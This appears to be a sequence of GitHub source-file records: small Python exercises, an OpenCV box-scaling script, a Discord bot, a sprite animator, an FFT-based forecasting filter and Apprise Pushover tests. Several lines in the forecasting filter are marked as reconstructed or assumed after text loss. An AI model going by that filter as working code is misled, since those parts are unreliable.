+number_called_by_bangalore_list\n\treturn feedback_string\n\ndef number_count_bangalore_bangalore(input_csv):\n\t#def_var area:\n\tnumber_count_bangalore_all = 0\n\tnumber_count_bangalore_bangalore = 0\n\t#step1: count the two kinds of calls (Bangalore to anywhere, Bangalore to Bangalore).\n\tfor i in input_csv:\n\t\tif \"(080)\" in i[0]:\n\t\t\tnumber_count_bangalore_all += 1.0\n\t\t\tif \"(080)\" in i[1]:\n\t\t\t\tnumber_count_bangalore_bangalore += 1.0\n\t#step2: compute the percentage and build the result string for return.\n\tfeedback_cache_percent = round((number_count_bangalore_bangalore / number_count_bangalore_all) * 100,2)\n\tfeedback_string = \"{} percent of calls from fixed lines in Bangalore are calls to other fixed lines in Bangalore.\".format(feedback_cache_percent)\n\treturn feedback_string\n\nprint(number_called_by_bangalore(calls))\nprint(number_count_bangalore_bangalore(calls))","repo_name":"Abel712/Udacity_Python-introduction-","sub_path":"Project1=investigate-texts-and-calls/Task3.py","file_name":"Task3.py","file_ext":"py","file_size_in_byte":2357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"38537133987","text":"from sys import stdin\ninput = stdin.readline\ndef solution(N):\n    # coin-change style DP: dp[i] = number of ways to write i as a sum of 1s, 2s\n    # and 3s, ignoring order (e.g. dp[4] == 4: 1+1+1+1, 1+1+2, 2+2, 1+3)\n    dp = [1] * 10001\n    for i in range(2, 10001):\n        dp[i] += dp[i-2]\n    \n    for i in range(3, 10001):\n        dp[i] += dp[i-3]\n\n    for _ in range(N):\n        t = int(input())\n        print(dp[t])\n\nsolution(int(input()))","repo_name":"oo009pbh/Today-I-learn","sub_path":"DP/1, 2, 3 더하기 4.py","file_name":"1, 2, 3 더하기 4.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"26835249322","text":"# Adjust the bounding-box positions according to the image size\n\nimport cv2\ntry:\n    from cv2 import cv2\nexcept ImportError:\n    pass\nimport numpy as np\n\n\ndef cvTest():\n    image = cv2.imread('./catNdog.png')\n    y_ = image.shape[0]\n    x_ = image.shape[1]\n\n    target_size = 256\n    x_scale = target_size / x_\n
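    # --- Illustrative aside (added; not part of the original script) ---\n    # Worked example of the scale factors, assuming a 640x480 source image:\n    #   x_scale = 256 / 640 = 0.4 and y_scale = 256 / 480 ~= 0.533, so a box\n    #   with x_min=100, w=50 maps to x1=round(100*0.4)=40 and\n    #   x2=round((100+50)*0.4)=60 in the resized 256x256 image.\n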
    y_scale = target_size / y_\n    print('x_scale >> ', x_scale, '\\ny_scale >> ', y_scale)\n\n    img = cv2.resize(image, (target_size, target_size))\n    bboxes = [[3.96, 183.38, 200.88, 214.03], [468.94, 92.01, 171.06, 248.45]]\n    for boxes in bboxes:\n        x_min, y_min, w, h = boxes\n\n        x1 = int(np.round(x_min * x_scale))\n        y1 = int(np.round(y_min * y_scale))\n        x2 = int(np.round((x_min+w) * x_scale))\n        y2 = int(np.round((y_min+h) * y_scale))\n\n        cv2.rectangle(img, (x1, y1), (x2, y2), (255, 0, 0), 1)\n\n    cv2.imshow('test', img)\n    cv2.waitKey(0)\n\n\n\nif __name__ == '__main__':\n    cvTest()","repo_name":"NoirCade/MS-AI-School","sub_path":"53일차/ex02.py","file_name":"ex02.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"40793624349","text":"from collections import defaultdict  # fixed: 'from typing import DefaultDict' is a type alias, not a factory\nimport asyncio\nimport configparser\nimport os.path\n\nfrom discord.ext import commands\nimport texttable\n\nimport creds\n\nconfig = configparser.ConfigParser()\nif not os.path.exists(\"./stats.ini\"): \n    with open(\"./stats.ini\",\"w\") as cfg:\n        config.write(cfg)\nconfig.read('./stats.ini')\n\nbot = commands.Bot(command_prefix='>', description=\"This is a Helper Bot\")\nlateMessage = defaultdict(bool)\n\n\n@bot.command()\nasync def late(ctx, *args):\n    global lateMessage\n    print(\"late\")\n    for name in args:\n        lateMessage[name] = True\n        await ctx.send(f'{name} is running late...')\n        if name not in config:\n            config[name] = {\"timesLate\":int(1), \"minsLate\":int(0)}\n        else:\n            config[name][\"timesLate\"] = str(int(config[name][\"timesLate\"]) + 1)\n        config[name][\"minsLate\"] = str(int(config[name][\"minsLate\"]) + 1)\n    i = 1\n    while True:\n        count = 0\n        await asyncio.sleep(5)\n        for name in args:\n\n            if lateMessage[name] == True:\n                count += 1\n                print(config[name][\"minsLate\"] )\n                config[name][\"minsLate\"] = str(int(config[name][\"minsLate\"]) + 1)\n                await ctx.send(f'{name} is {i} minute(s) late...')\n        if count == 0:\n            break\n        i += 1\n\n@bot.command()\nasync def here(ctx, *args):\n    global lateMessage\n    print(\"Starting here\")\n    for name in args:\n        if lateMessage[name]:\n            await ctx.send(f\"...And {name} is finally here!\")\n            lateMessage[name] = False\n    with open(\"./stats.ini\",\"w\") as cfg:\n        config.write(cfg)\n\n@bot.command()\nasync def stats(ctx, *args):\n    table = texttable.Texttable()\n    table.add_row([\"Name\", \"Times Late\", \"Minutes Late\"])\n    if len(args) == 0:\n        for section in config.sections():\n            table.add_row([section, config[section][\"timesLate\"], config[section][\"minsLate\"]]) \n    else:\n        for name in args:\n            if config.has_section(name):\n                table.add_row([name, config[name][\"timesLate\"], config[name][\"minsLate\"]]) \n            else:\n                table.add_row([name, 0, 0]) \n\n    await ctx.send(f\"```{table.draw()}```\") \n\nbot.run(creds.token)\n","repo_name":"jkershaw2000/late-bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"7407569067","text":"import pygame\n
from . import spritebatch\n\nclass SpriteAnimation:\n\n    def __init__(self, surface, dimensions, sprite_count, loop=False, animation_frames=1):\n        \"\"\"Load Sprite Sheet\"\"\"\n        self.sprites = spritebatch.get_sprite_batch( surface, dimensions, sprite_count )\n        self.sprite_dimensions = dimensions\n        self.sprite_iter = 0\n        self.loop = loop\n        self.animation_frames = animation_frames\n        self.current_frame = animation_frames\n        self.sprite_count = sprite_count\n\n    def getSpriteBox(self):\n        # Convert sprite to rectangle format\n        sprite_box = pygame.Rect( 0, 0, self.sprite_dimensions[2], self.sprite_dimensions[3] )\n        return sprite_box\n\n    def resetFrames(self):\n        self.sprite_iter = 0\n        self.current_frame = self.animation_frames  # fixed: bare 'animation_frames' was a NameError\n\n    def setNextFrame(self):\n        self.current_frame -= 1\n        if self.current_frame == 0:\n            self.sprite_iter += 1\n            self.current_frame = self.animation_frames\n            if ( self.sprite_iter >= self.sprite_count ):\n                if not self.loop:\n                    # fixed: clamp to the last frame so getCurrentFrame cannot index past the end\n                    self.sprite_iter = self.sprite_count - 1\n                    return\n                else:\n                    self.sprite_iter = 0\n\n    def getCurrentFrame(self):\n        image = self.sprites[ self.sprite_iter ]\n        return image\n","repo_name":"adinh254/Pac-Portal","sub_path":"pacportal/spritesheet/spriteanimation.py","file_name":"spriteanimation.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"15374127800","text":"import numpy as np\r\nfrom operator import itemgetter\r\nimport time as tm\r\nimport RALF1FilterX as XFilter\r\nimport sys\r\nimport lfib1340 \r\nfrom scipy import stats as scp\r\nimport win32api,win32process,win32con\r\n#from scipy.signal import savgol_filter\r\n \r\npriorityclasses = [win32process.IDLE_PRIORITY_CLASS,\r\n                   win32process.BELOW_NORMAL_PRIORITY_CLASS,\r\n                   win32process.NORMAL_PRIORITY_CLASS,\r\n                   win32process.ABOVE_NORMAL_PRIORITY_CLASS,\r\n                   win32process.HIGH_PRIORITY_CLASS,\r\n                   win32process.REALTIME_PRIORITY_CLASS]\r\n\r\ndef filterFourierQ(arxx,arb,NNew,NChan): \r\n    Nfl=int(len(arb)/NChan)\r\n    Nnl=NNew\r\n    \r\n    ar_=np.zeros(Nnl,float)\r\n    farx=np.zeros(Nnl,float)\r\n    \r\n    az=int(np.floor(Nfl/Nnl))-1\r\n    \r\n    for l in range(NChan): \r\n        for i in range(az):\r\n            for j in range(Nnl):\r\n                ar_[j]=arb[Nfl-(az-i+1)*Nnl+j+Nfl*l]\r\n            ar_=abs(np.fft.fft(ar_))\r\n            for j in range(Nnl):\r\n                farx[j]=max(farx[j],ar_[j])\r\n    \r\n    farx[0]=1e-32\r\n    arxr=np.zeros(Nfl*NChan,float) \r\n    for l in range(NChan): \r\n        farxx=np.fft.fft(arxx[Nfl-Nnl+Nfl*l:Nfl+Nfl*l]) \r\n        mfarxx=abs(farxx) \r\n        mfarxx[0]=1e-32\r\n        srmfarxx=.62*np.mean(mfarxx[1:])\r\n        farxxx=np.zeros(Nnl,complex) \r\n        for j in range(1,Nnl):\r\n            if mfarxx[j]>srmfarxx:\r\n                farxxx[j]=farxx[j]/mfarxx[j]*farx[j] \r\n            else:\r\n                farxxx[j]=0 \r\n        farxxx[0]=farxx[0]\r\n        farxxx2=np.zeros(2*Nnl,complex)\r\n        farxxx2=farxxx.copy()\r\n        arxr[Nfl-Nnl+Nfl*l:Nfl+Nfl*l]=np.fft.ifft(farxxx2).real[0:Nnl] \r\n        arxr[0+Nfl*l:Nfl-Nnl+Nfl*l]=arb[0+Nfl*l:Nfl-Nnl+Nfl*l].copy() \r\n    return arxr\r\n
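\r\n# --- Illustrative aside (added; not part of the original script) ---\r\n# filterFourierQ keeps each forecast window plausible by re-imposing a\r\n# magnitude envelope taken from history onto the new window's phases:\r\n#\r\n#   F = np.fft.fft(x_new)\r\n#   phase = F / np.abs(F)                       # unit-modulus phases (F != 0)\r\n#   x_filtered = np.fft.ifft(phase * envelope).real\r\n#\r\n# where envelope[j] is the max of |FFT(window)|[j] over past windows, and\r\n# bins whose magnitude falls below ~0.62 of the mean are zeroed as noise.\r\n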
\r\ndef RALF1FilterQ(dQ2): \r\n    Np=len(dQ2)\r\n    Nf=len(dQ2[0])\r\n    \r\n    SdQ=np.mean(dQ2,0) \r\n    sSdQ=np.std(np.asarray(SdQ,float))\r\n    for i in range(Np):\r\n        SdQj_ = np.std(np.asarray(dQ2[i] - SdQ,float))\r\n        SdQj__ = np.std(np.asarray(dQ2[i],float)) \r\n        if SdQj__ >0. and sSdQ>0.:\r\n            dQ2[i] = np.asarray(dQ2[i] +SdQ * ((SdQj_ - sSdQ)/ sSdQ ),np.float16)\r\n        else:\r\n            dQ2[i]=np.zeros(Nf,np.float16)  \r\n    return dQ2\r\n\r\ndef RandomQ(Nfx):\r\n    KK=3e6\r\n    liiX=np.zeros(Nfx,float)\r\n    pp=0\r\n    while pp<0.055:\r\n        for ii in range(3):\r\n            z=np.random.randint(Nfx)/KK \r\n            atim0=tm.time() \r\n            tm.sleep(z) \r\n            atim=tm.time() \r\n            dd=int((atim-atim0-z)*KK)\r\n            zz=np.asarray(range(Nfx),float)/KK\r\n            lfib1340.LFib1340(dd).shuffle(zz) \r\n            liiX=liiX+zz\r\n        \r\n        k2, pp = scp.normaltest(liiX)\r\n    \r\n    r2=[[],[]]\r\n    r2[0]= np.asarray(liiX[0:Nfx],float)\r\n    r2[1]= np.asarray(range(Nfx),int)\r\n    m=[[r2[j][l] for j in range(len(r2))] for l in range(len(r2[0]))] \r\n    m.sort(key=itemgetter(0)) \r\n    r2=[[m[j][l] for j in range(len(m))] for l in range(len(m[0]))] \r\n    liiXX=np.asarray(r2[1],int)\r\n    return liiXX\r\n    \r\ndef RALF1Calculation(arr_bx,Nf,NNew,NChan,D,Nhh):\r\n    Koe=1e-4 \r\n    arr_bZ=[]\r\n    arr_b=np.asarray(arr_bx,float)\r\n    #arr_b[0]=0\r\n    for l in range(NChan):\r\n        #arr_b[l]=arr_bx[l]-arr_bx[l-1] \r\n        arr_bZ.append(arr_b[0+Nf*l:Nf-NNew+Nf*l]) \r\n    arr_bZ=np.asarray(arr_bZ,np.float16)\r\n    mn=np.mean(arr_bZ)\r\n    sz=Nf*NChan\r\n    \r\n    hh=0\r\n    ann=0\r\n    \r\n    arr_bbx=[]\r\n    while hh<Nhh:  # reconstructed loop header: a '<...>' span was lost in extraction here.\r\n        # NOTE: the lost span also set up the working matrix dQ3, the mask/noise\r\n        # matrix mDD and the shuffle index liix used below; that setup could not\r\n        # be recovered from the remnants.\r\n        w=1\r\n        while w>0:  # assumed retry loop -- the try/except below toggles w\r\n            try: \r\n                dQ3A=dQ3-mn \r\n                dQ3B=dQ3A-dQ3A*np.asarray(dQ3A<0,int) \r\n                dQ2X=XFilter.RALF1FilterX(dQ3B+mDD,sz,sz,1,0)\r\n                dQ3C=-(dQ3A-dQ3A*np.asarray(dQ3A>0,int)) \r\n                dQ2Y=-XFilter.RALF1FilterX(dQ3C+mDD,sz,sz,1,0)\r\n                dQ3=dQ3*0\r\n                for i in range(sz): \r\n                    dQ3[:][liix[i]]=((dQ2X[i]+dQ2Y[i])) \r\n                aMx=np.max(dQ3,0)\r\n                aMn=np.min(dQ3,0)\r\n                w=0\r\n            except:\r\n                w=1\r\n            else: \r\n                dQ3_0=dQ3.copy()-mn \r\n\r\n                Ndel=2#int(np.ceil(np.sqrt(sz)))\r\n                NCh=int(np.ceil(sz/Ndel)) \r\n                Ndel0=1\r\n                NCh0=int(np.ceil(sz/Ndel0)) \r\n                annn=1\r\n                \r\n                ss4=0\r\n                while annn>0: \r\n                    dQ3=dQ3_0.copy()\r\n                    zz=9\r\n                    dQ3mx=np.zeros((sz,sz),np.float16)-np.Inf\r\n                    dQ3mn=np.zeros((sz,sz),np.float16)+np.Inf\r\n                    NumFri=RandomQ(sz)\r\n                    NumFri_=RandomQ(sz) \r\n                    r5=RandomQ(sz) \r\n                    r5=D*((r5/np.std(r5))/2+Koe*10) \r\n                    \r\n                    NumFri=np.concatenate((NumFri, NumFri)) \r\n                    NumFri_=np.concatenate((NumFri_, NumFri_)) \r\n                    r5=np.concatenate((r5, r5)) \r\n                    \r\n                    while zz>=0: \r\n                        try: \r\n                            for uuu in range(Nhh):\r\n                                if zz>=0:\r\n                                    ss4=ss4+1\r\n                                    ss4_=ss4-int(ss4/sz)*sz\r\n                                    NumFri0=NumFri[ss4_:].copy()\r\n                                    NumFri0_=NumFri_[ss4_:].copy()\r\n                                    for kk in range(Ndel):\r\n                                        ii=int(kk*NCh)\r\n                                        for k in range(Ndel0):\r\n                                            i=int(k*NCh0) \r\n                                            dQ4=np.zeros((NCh,NCh0),float)\r\n                                            mDD4=np.zeros((NCh,NCh0),float) \r\n                                            for ll in range(NCh0):\r\n                                                dQ4[:,ll]=(dQ3[NumFri0[ii:ii+NCh],NumFri0_[i+ll]])*1.\r\n                                                mDD4[:,ll]=(mDD[NumFri0[ii:ii+NCh],NumFri0_[i+ll]])*1.\r\n                                                mDD4[:,ll]= r5[ll+k+kk:ll+k+kk+NCh]*(1-(mDD4[:,ll]<np.Inf))  # reconstructed tail: a '<...>' span was lost in extraction\r\n                                            dQ4mn=np.min(dQ4)  # assumed definition; dQ4mn is referenced below but its assignment was lost\r\n                                            dQ4_A=np.asarray((XFilter.RALF1FilterX((dQ4-dQ4*(dQ4<0))+mDD4,len(dQ4),len(dQ4[0]),1,0))+dQ4mn/2,np.float16)  # assumed, mirrors dQ4_B\r\n                                            dQ4_B=np.asarray(-(XFilter.RALF1FilterX(-(dQ4-dQ4*(dQ4>0))+mDD4,len(dQ4),len(dQ4[0]),1,0))+dQ4mn/2,np.float16)\r\n                                            if not (np.isnan(np.mean(dQ4_A))+np.isnan(np.mean(dQ4_B))): \r\n                                                for ll in range(NCh0):\r\n                                                    dQ3mx[NumFri0[ii:ii+NCh],NumFri0_[i+ll]]=(np.maximum(\r\n                                                        dQ3mx[NumFri0[ii:ii+NCh],NumFri0_[i+ll]],dQ4_A[:,ll]))\r\n                                                    dQ3mn[NumFri0[ii:ii+NCh],NumFri0_[i+ll]]=(np.minimum(\r\n                                                        dQ3mn[NumFri0[ii:ii+NCh],NumFri0_[i+ll]],dQ4_B[:,ll]))\r\n                            \r\n                            if not (np.isnan(np.mean(dQ3mx))+np.isnan(np.mean(dQ3mn))+np.isnan(dQ4mn)+np.abs(dQ4mn)==np.Inf): \r\n                                dQ3A=(dQ3mx+dQ3mn)*(1-(mDD<np.Inf))  # reconstructed: a '<...>' span was lost; the mask form is assumed\r\n                                dQ3B=dQ3A-dQ3A*np.asarray(dQ3A<0,int)  # assumed, mirrors the intact branch above\r\n                                dQ2X=XFilter.RALF1FilterX(dQ3B+mDD,sz,sz,1,0)+dQ4mn/2  # assumed, mirrors dQ2Y below\r\n                                dQ3C=-(dQ3A-dQ3A*np.asarray(dQ3A>0,int)) \r\n                                dQ2Y=-XFilter.RALF1FilterX(dQ3C+mDD,sz,sz,1,0)+dQ4mn/2\r\n                                if not (np.isnan(np.mean(dQ2X))+np.isnan(np.mean(dQ2Y))): \r\n                                    dQ3=np.asarray((dQ2X+dQ2Y)*(1-(mDD<np.Inf)),np.float16)  # reconstructed: a '<...>' span was lost\r\n                                    annn=0  # assumed: success clears the outer retry flag\r\n                                if np.sum(np.isnan(dQ3))>0 or (np.isnan(dQ4mn)+np.abs(dQ4mn)==np.Inf):\r\n                                    annn=1\r\n                                    zz=-1\r\n                            \r\n                        except:\r\n                            annn=1\r\n                            zz=-1\r\n                        \r\n                        zz=zz-1\r\n            \r\n            dQ3=dQ3*0\r\n
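            # --- Illustrative aside (added; not part of the original script) ---\r\n            # The loop below undoes the row shuffle: row i of the filtered matrix\r\n            # is written back to its original position liix[i].  Note that for a\r\n            # NumPy array dQ3[:] is a *view*, so dQ3[:][liix[i]] = ... is\r\n            # equivalent to dQ3[liix[i]] = ... and does mutate dQ3 in place.\r\n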
            for i in range(sz): \r\n                dQ3[:][liix[i]]=np.asarray((dQ2X[i]+dQ2Y[i]),np.float16)\r\n    \r\n        del(dQ3mx)\r\n        del(dQ3mn) \r\n        aMx=np.max(dQ3,0)\r\n        aMn=np.min(dQ3,0) \r\n        \r\n        # Nfl=int(len(arr_bx)/NChan)\r\n        # for l in range(NChan): \r\n        #     aMx[0+Nfl*l:Nfl+Nfl*l]= savgol_filter(aMx[0+Nfl*l:Nfl+Nfl*l], 11, 5)\r\n        #     aMn[0+Nfl*l:Nfl+Nfl*l]= savgol_filter(aMn[0+Nfl*l:Nfl+Nfl*l], 11, 5)\r\n        \r\n        ann=sum(np.isnan(aMx + aMn))\r\n        if ann==0: \r\n            if hh==0: \r\n                AMX=aMx.copy()\r\n                AMN=aMn.copy() \r\n            else:\r\n                AMX=np.maximum(AMX,aMx)\r\n                AMN=np.minimum(AMN,aMn)\r\n            \r\n            arr_bbbxxx=AMX+AMN\r\n            arr_bbbxxx=filterFourierQ(arr_bbbxxx,arr_b,NNew,NChan)\r\n            if hh==0:\r\n                arr_bbx=arr_bbbxxx.copy() \r\n            else: \r\n                arr_bbx=(arr_bbx*hh+arr_bbbxxx)/(hh+1) \r\n            hh=hh+1\r\n        \r\n        #arr_bbbxxx=aMx + aMn \r\n        # ann=sum(np.isnan(arr_bbbxxx))\r\n        # if ann==0: \r\n        #     arr_bbx.append(arr_bbbxxx) \r\n        #     hh=hh+1\r\n\r\n    \r\n    # arr_bbx=np.asarray(arr_bbx,float).transpose()\r\n    # for l in range(NChan):\r\n    #     for ii in range(NNew): \r\n    #         arr_b[Nfl-NNew+Nfl*l+ii]=(max(arr_bbx[Nfl-NNew+Nfl*l+ii])+min(arr_bbx[Nfl-NNew+Nfl*l+ii]))/2\r\n\r\n    # arr_b=filterFourierQ(arr_b,arr_b,NNew,NChan)\r\n    return arr_bbx+mn\r\n\r\ndef RALf1FiltrQ(args):\r\n    pid = win32api.GetCurrentProcessId()\r\n    handle = win32api.OpenProcess(win32con.PROCESS_ALL_ACCESS, True, pid)\r\n    win32process.SetPriorityClass(handle, priorityclasses[1])\r\n    NChan=int(args[1])\r\n    NNew=int(args[2])\r\n    Nhh=int(args[3])\r\n    Nf=int(len(args)-4) \r\n    \r\n    arr_bb=[] \r\n    for i in range(Nf):\r\n        arr_bb.append(args[4+i])\r\n    arr_bb=np.asarray(arr_bb,float)\r\n    \r\n    arr_b=arr_bb.copy() \r\n    Nf=int(arr_b.size/NChan)\r\n    arr_bZ=[]\r\n    for l in range(NChan):\r\n        arr_bZ.append(arr_b[0+Nf*l:Nf-NNew+Nf*l]) \r\n    arr_bZ=np.asarray(arr_bZ,float)\r\n    D=np.std(arr_bZ)\r\n    arr_b=np.asarray(arr_bb,np.float16) \r\n    NNew=int(NNew*1.1) \r\n    while 1==1: \r\n        hh=0\r\n        ann=0\r\n        arr_bbx=[]\r\n        Nch=0\r\n        Koef=np.zeros(Nhh,float)\r\n        KoefA=np.zeros(Nhh,float)\r\n        while hh<Nhh:  # reconstructed loop header: a '<...>' span was lost in extraction here\r\n            arr_bbbxxx=RALF1Calculation(arr_b,Nf,NNew,NChan,D,Nhh)  # assumed: one filtering pass per iteration\r\n            ann=sum(np.isnan(arr_bbbxxx))\r\n            if ann==0:\r\n                mm1=arr_bbbxxx[Nf-NNew:Nf]  # assumed: the rebuilt tail of the series ...\r\n                mm2=arr_bb[Nf-NNew:Nf]      # ... compared against the reference input\r\n                if np.std(mm1)*np.std(mm2)>0:\r\n                    KoefA[hh]=100*scp.spearmanr(mm1,mm2)[0]\r\n                else:\r\n                    KoefA[hh]=0\r\n                arr_bbx.append(arr_bbbxxx) \r\n                hh=hh+1\r\n            else:\r\n                hh=Nhh+2\r\n        arr_bbx=np.asarray(arr_bbx,float).transpose()  # assumed (lost in extraction), mirrors the commented-out block above\r\n        Nch=int(np.argmax(KoefA))  # assumed: keep the best-correlated pass\r\n        if hh<Nhh+2 and np.max(KoefA)>0:  # reconstructed: a '<...>' span was lost in extraction\r\n            for l in range(NChan):\r\n                arr_b[Nf-NNew+Nf*l:Nf+Nf*l]=arr_bbx[Nf-NNew+Nf*l:Nf+Nf*l,Nch].copy() \r\n            break  # assumed: success leaves the 'while 1==1' retry loop\r\n    arr_b=filterFourierQ(arr_b,arr_b,NNew,NChan)\r\n    return arr_b\r\n\r\nif __name__ == '__main__':\r\n    RALf1FiltrQ(sys.argv)","repo_name":"VadimChornyy/RALF1","sub_path":"RALf1FiltrVIDY.py","file_name":"RALf1FiltrVIDY.py","file_ext":"py","file_size_in_byte":15750,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
{"seq_id":"15224792547","text":"import os\nfrom unittest import mock\n\nimport requests\nimport pytest\nfrom json import dumps\nfrom apprise.plugins.NotifyPushover import PushoverPriority, NotifyPushover\nimport apprise\nfrom helpers import AppriseURLTester\n\n# Disable logging for a cleaner testing output\nimport logging\nlogging.disable(logging.CRITICAL)\n\n# Attachment Directory\nTEST_VAR_DIR = os.path.join(os.path.dirname(__file__), 'var')\n\n# Our Testing URLs\napprise_url_tests = (\n    ('pover://', {\n        'instance': TypeError,\n    }),\n    # bad url\n    ('pover://:@/', {\n        'instance': TypeError,\n    }),\n    # APIkey; no user\n    ('pover://%s' % ('a' * 30), {\n        'instance': TypeError,\n    }),\n    # API Key + custom sound setting\n    ('pover://%s@%s?sound=mysound' % ('u' * 30, 'a' * 30), {\n        'instance': NotifyPushover,\n    }),\n    # API Key + valid alternate sound picked\n    ('pover://%s@%s?sound=spacealarm' % ('u' * 30, 'a' * 30), {\n        'instance': NotifyPushover,\n    }),\n
    # API Key + valid url_title with url\n    ('pover://%s@%s?url=my-url&url_title=title' % ('u' * 30, 'a' * 30), {\n        'instance': NotifyPushover,\n    }),\n    # API Key + Valid User\n    ('pover://%s@%s' % ('u' * 30, 'a' * 30), {\n        'instance': NotifyPushover,\n        # don't include an image by default\n        'include_image': False,\n    }),\n    # API Key + Valid User + 1 Device\n    ('pover://%s@%s/DEVICE' % ('u' * 30, 'a' * 30), {\n        'instance': NotifyPushover,\n    }),\n    # API Key + Valid User + 1 Device (via to=)\n    ('pover://%s@%s?to=DEVICE' % ('u' * 30, 'a' * 30), {\n        'instance': NotifyPushover,\n    }),\n    # API Key + Valid User + 2 Devices\n    ('pover://%s@%s/DEVICE1/Device-with-dash/' % ('u' * 30, 'a' * 30), {\n        'instance': NotifyPushover,\n\n        # Our expected url(privacy=True) startswith() response:\n        'privacy_url': 'pover://u...u@a...a',\n    }),\n    # API Key + Valid User + invalid device\n    ('pover://%s@%s/%s/' % ('u' * 30, 'a' * 30, 'd' * 30), {\n        'instance': NotifyPushover,\n        # Notify will return False since there is a bad device in our list\n        'response': False,\n    }),\n    # API Key + Valid User + device + invalid device\n    ('pover://%s@%s/DEVICE1/%s/' % ('u' * 30, 'a' * 30, 'd' * 30), {\n        'instance': NotifyPushover,\n        # Notify will return False since there is a bad device in our list\n        'response': False,\n    }),\n    # API Key + priority setting\n    ('pover://%s@%s?priority=high' % ('u' * 30, 'a' * 30), {\n        'instance': NotifyPushover,\n    }),\n    # API Key + priority setting + html mode\n    ('pover://%s@%s?priority=high&format=html' % ('u' * 30, 'a' * 30), {\n        'instance': NotifyPushover,\n    }),\n    # API Key + priority setting + markdown mode\n    ('pover://%s@%s?priority=high&format=markdown' % ('u' * 30, 'a' * 30), {\n        'instance': NotifyPushover,\n    }),\n    # API Key + invalid priority setting\n    ('pover://%s@%s?priority=invalid' % ('u' * 30, 'a' * 30), {\n        'instance': NotifyPushover,\n    }),\n    # API Key + emergency(2) priority setting\n    ('pover://%s@%s?priority=emergency' % ('u' * 30, 'a' * 30), {\n        'instance': NotifyPushover,\n    }),\n    # API Key + emergency(2) priority setting (via numeric value\n    ('pover://%s@%s?priority=2' % ('u' * 30, 'a' * 30), {\n        'instance': NotifyPushover,\n    }),\n    # API Key + emergency priority setting with retry and expire\n    ('pover://%s@%s?priority=emergency&%s&%s' % ('u' * 30,\n                                                 'a' * 30,\n                                                 'retry=30',\n                                                 'expire=300'), {\n        'instance': NotifyPushover,\n    }),\n    # API Key + emergency priority setting with text retry\n    ('pover://%s@%s?priority=emergency&%s&%s' % ('u' * 30,\n                                                 'a' * 30,\n                                                 'retry=invalid',\n                                                 'expire=300'), {\n        'instance': NotifyPushover,\n    }),\n    # API Key + emergency priority setting with text expire\n    ('pover://%s@%s?priority=emergency&%s&%s' % ('u' * 30,\n                                                 'a' * 30,\n                                                 'retry=30',\n                                                 'expire=invalid'), {\n        'instance': NotifyPushover,\n    }),\n    # API Key + emergency priority setting with invalid expire\n    ('pover://%s@%s?priority=emergency&%s' % ('u' * 30,\n                                              'a' * 30,\n                                              'expire=100000'), {\n        'instance': TypeError,\n    }),\n    # API Key + emergency priority setting with invalid retry\n    ('pover://%s@%s?priority=emergency&%s' % ('u' * 30,\n                                              'a' * 30,\n                                              'retry=15'), {\n        'instance': TypeError,\n    }),\n    # API Key + priority setting (empty)\n    ('pover://%s@%s?priority=' % ('u' * 30, 'a' * 30), {\n        'instance': NotifyPushover,\n    }),\n    ('pover://%s@%s' % ('u' * 30, 'a' * 30), {\n        'instance': NotifyPushover,\n        # force a failure\n        'response': False,\n        'requests_response_code': requests.codes.internal_server_error,\n    }),\n    ('pover://%s@%s' % ('u' * 30, 'a' * 30), {\n        'instance': NotifyPushover,\n        # throw a bizarre code forcing us to fail to look it up\n
        'response': False,\n        'requests_response_code': 999,\n    }),\n    ('pover://%s@%s' % ('u' * 30, 'a' * 30), {\n        'instance': NotifyPushover,\n        # Throws a series of connection and transfer exceptions when this flag\n        # is set and tests that we gracefully handle them\n        'test_requests_exceptions': True,\n    }),\n)\n\n\ndef test_plugin_pushover_urls():\n    \"\"\"\n    NotifyPushover() Apprise URLs\n\n    \"\"\"\n\n    # Run our general tests\n    AppriseURLTester(tests=apprise_url_tests).run_all()\n\n\n@mock.patch('requests.post')\ndef test_plugin_pushover_attachments(mock_post, tmpdir):\n    \"\"\"\n    NotifyPushover() Attachment Checks\n\n    \"\"\"\n\n    # Initialize some generic (but valid) tokens\n    user_key = 'u' * 30\n    api_token = 'a' * 30\n\n    # Prepare a good response\n    response = mock.Mock()\n    response.content = dumps(\n        {\"status\": 1, \"request\": \"647d2300-702c-4b38-8b2f-d56326ae460b\"})\n    response.status_code = requests.codes.ok\n\n    # Prepare a bad response\n    bad_response = mock.Mock()\n    bad_response.content = dumps(\n        {\"status\": 1, \"request\": \"647d2300-702c-4b38-8b2f-d56326ae460b\"})  # fixed: was assigned to 'response', clobbering the good mock\n    bad_response.status_code = requests.codes.internal_server_error\n\n    # Assign our good response\n    mock_post.return_value = response\n\n    # prepare our attachment\n    attach = apprise.AppriseAttachment(\n        os.path.join(TEST_VAR_DIR, 'apprise-test.gif'))\n\n    # Instantiate our object\n    obj = apprise.Apprise.instantiate(\n        'pover://{}@{}/'.format(user_key, api_token))\n    assert isinstance(obj, NotifyPushover)\n\n    # Test our attachment\n    assert obj.notify(body=\"test\", attach=attach) is True\n\n    # Test our call count\n    assert mock_post.call_count == 1\n    assert mock_post.call_args_list[0][0][0] == \\\n        'https://api.pushover.net/1/messages.json'\n\n    # Reset our mock object for multiple tests\n    mock_post.reset_mock()\n\n    # Test multiple attachments\n    assert attach.add(os.path.join(TEST_VAR_DIR, 'apprise-test.gif'))\n    assert obj.notify(body=\"test\", attach=attach) is True\n\n    # Test our call count\n    assert mock_post.call_count == 2\n    assert mock_post.call_args_list[0][0][0] == \\\n        'https://api.pushover.net/1/messages.json'\n    assert mock_post.call_args_list[1][0][0] == \\\n        'https://api.pushover.net/1/messages.json'\n\n    # Reset our mock object for multiple tests\n    mock_post.reset_mock()\n\n    image = tmpdir.mkdir(\"pover_image\").join(\"test.jpg\")\n    image.write('a' * NotifyPushover.attach_max_size_bytes)\n\n    attach = 